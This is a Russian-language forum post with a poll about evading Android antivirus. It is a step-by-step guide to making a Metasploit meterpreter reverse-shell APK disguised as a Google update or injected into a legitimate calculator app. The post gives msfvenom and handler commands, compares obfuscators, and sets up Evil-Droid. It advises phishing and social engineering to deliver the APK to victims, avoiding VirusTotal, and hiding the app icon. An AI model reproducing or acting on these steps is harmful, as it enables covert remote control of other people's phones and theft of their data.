• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Как вы обходите AV защиту на Android

  • AVPass

    Голосов: 1 1,9%
  • ProGuard

    Голосов: 3 5,7%
  • Stringer Java Obfuscation

    Голосов: 2 3,8%
  • Apkwash

    Голосов: 2 3,8%
  • Evil-Droid

    Голосов: 4 7,5%
  • Напишу в комментариях

    Голосов: 1 1,9%
  • Никак

    Голосов: 40 75,5%

  • Всего проголосовало
    53

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
Вcтупление.

Все, кто знаком с Metasploit Project, скорее всего знакомы с MSFvenom (популярный генератор payload) и Meterpreter (расширяемая нагрузка для пост-эксплуатации). С помощью этих инструментов можно при определенных условиях получить НСД к Android-устройству (небольшой мануал для тех, кто не в теме https://codeby.net/forum/threads/sposob-dostavki-payload-na-smartfon-bazirovannyj-na-android.60929/).
Это выглядит примерно так:
# cd/sdcard
# msfvenom -p android/meterpreter/reverce_tcp lhost=192.168.1.45 lport=443 R > google_update.apk
# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set lhost 192.168.1.45
# set lport 443
# exploit
meterpreter >

Мануал предназначен для продвинутых пользователей, интересующихся мобильным пентестом и установкой кастомных прошивок. Это означает, что некоторые очевидные моменты я буду опускать. Cайты на которых есть подробности - 4pda, xda-developers, kali.org.

Ссылки в рамках данного мануала не являются рекламой.


Но не все так просто. Не зря выше я написал про "примерно" и "определенные условия". Я часто читаю комментарии под видео на YouTube от кретинов: "Автор мудак, ничего не объясняет, просто пишет команды в консоли". А вы думали вас еще бесплатно кто-то учить с 0 будет? Это вам не школа, сука. Нету никакой кнопки "ВЫСЛЕДИТЬ ПО IP И ВЗЛОМАТЬ"
есть вычислить по IQ тупого школьника.
В нашем деле нету однозначно работающих решений, мир вокруг нас постоянно меняется, в том числе ИТ-сфера, старые методы взлома перестают работать, все время надо искать что-то новое.

Так вот, некоторых очень волнует вопрос: "А как закинуть наш google_update.apk на смартфон жертве, да еще чтобы AV не детектировал наш файл? Для этого нужно закриптовать
обфусцировать приложение, прогнать через Zipalign, подписать и а также применить СИ для доставки на целевое устройство. Дефолтный apk, который выплевывает MSFvenom ни на что не годен - скажите, кто будет устанавливать приложение с названием:"MainActivity", без иконки, с кучей требуемых разрешений? К тому же его скорее всего с радостью схрумкает AV жертвы.

Честно говоря есть еще один путь - собрать троян самостоятельно
https://codeby.net/forum/threads/sobiraem-skrytyj-trojan-na-android-persistence-chast-i.58392/ часть 1
https://codeby.net/forum/threads/sobiraem-skrytyj-trojan-na-andrroid-persistance-chast-ii.58467/ часть 2,
но мне не хотелось ебаться с Android SDK.

Я потратил немного времени на поиск обфускаторов для apk:
1. AVPass - вроде бы годный, и главное свежий проект. Но, к сожалению, я пока с ним не разобрался. Он выдает битые приложения, Zipalign не помогает. Кто пробовал его в работе - просьба отписать в тему/личку
(https://github.com/sslab-gatech/avpass

https://codeby.net/forum/threads/avpass-instrument-dlja-obxoda-antivirusa-na-android.60131/).

2. ProGuard - утилита, которая удаляет из скомпилированного кода неиспользуемые фрагменты и изменяет имена переменных и методов для усложнения реверс-инжиниринга приложения. Я сам мало работал с Android SDK и этот вариант не рассматривал, тоже было бы неплохо увидеть мануал по работе с ним
(https://www.guardsquare.com/en/proguard

http://jollydroid.ru/notebook/2016-12-29-ProGuard-1).

3. Stringer Java Obfuscation. Им я не пользовался, он платный, так же подозреваю что его выходную работу палят многие AV
(https://jfxstore.com/stringer/

https://habrahabr.ru/post/144377/).

4. Apkwash. Аналогично номеру 1, не было времени произвести полноценное тестирование. Вылезают какие-то странные баги.
(https://github.com/jbreed/apkwash
https://pentestlab.blog/2017/03/13/injecting-metasploit-payloads-into-android-applications/).


5. Evil-Droid. Тоже свежий проект, как раз он мне и понравился. Он предоставляет возможность создать дефолтную/обфусцированную нагрузку для meterpreter, собственную подпись, проводить инжект в "чистые" apk, клонировать/делать фейковые страницы. Так же из скрипта можно запустить MSF
(
https://github.com/M4sc3r4n0/Evil-Droid).

6. DexProtector. По нему информации почти нет.
(https://dexprotector.com/
https://jfxstore.com/stringer/ru/bl...chita-android-prilozheniy-na-grani-tehnologiy).


P.S. Если знаете еще способы - пишите в комментарии/личку


Установка.

Для начала ставим зависимости,
metasploit-framework, xterm, Zenity, Aapt, Apktool, Zipalign, (если apt-get install не находит пакет, пишем название с маленькой буквы)
затем сам скрипт:
# git clone https://github.com/M4sc3r4n0/Evil-Droid.git
# cd Evil-Droid
# chmod +x evil-droid

https://github.com/CorpOfHack/Evil-Droid-RU/
Наши коллеги с другого форума решили форкнуть данный проект, пока доступна только русификация

ВНИМАНИЕ: ни в ком случае не заливайте результаты своей работы на VirusTotal, используйте что-нибудь другое, не сливающее статистику. Либо просто тестируйте на виртуальной машине/реальном устройстве.


Использование.

1. запускаем скрипт: # ./evil-droid
68747470733a2f2f692e696d6775722e636f6d2f774372364859712e706e67
2. выбираем нужный нам пункт меню, тут самое интересное - можно выбрать 3 пункт, но тогда мы получим обычную MSF малварю, которая хоть и не будет съедена AV благодаря обработке скриптом, но имеет шансы засветиться, я предлагаю использовать более надежный метод - под номером 2 (инъекция в "чистое" приложение, я выбрал MyScript Calculator, Вы можете другое, однако имейте ввиду что некоторые, особенно mod варианты с 4pda не будут корректно обработаны)
3. дальше все просто, задаем параметры для полезной нагрузки, предлагаемые программой, для тех, кто хоть чуть-чуть знаком с MSF проблем не должно возникнуть
4. используем СИ, фишинг и иже с ними для доставки добра на целевое устройство
5. когда пользователь откроет у себя наше модифицированное приложение, мы получим meterpreter >
6. Profit!




Вопрос: "Как управлять устройством не из локальной сети, а из глобальной?

В качестве LHOST используйте свой публичный IP, payload необходимо выбрать reverse_https, LPORT=443, и пробросить порт на роутере 443 на локальный адрес Kali

Напомню, что разрешения, которые запрашивает приложение при установке, могут вызвать подозрения у пользователя. Так же советую подробно изучить Android-опции в meterpreter (например hide_app_icon, send_sms) и поработать со скриптом из под NetHunter. По результатам моих тестов на реальном устройстве DrWeb и Avast ничего не заметили(я про активную защиту, что будет при сканировании не смотрел).


P.S. Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отлично гуглится. Кейсом занимаюсь лично сам, если есть вопросы пишите в личку/тему.

P.P.S. Обзор рассчитан на пользователей, только начинающих работать с MSF и прочими инструментами для тестирования на проникновение в качестве практического примера. Так что не надо срать по этому поводу в теме.
 
Последнее редактирование:

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
UPD. Вспомнил про конкурс. Ув. @Night просьба выдать VC.
 

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
Последнее редактирование:
Сверху Снизу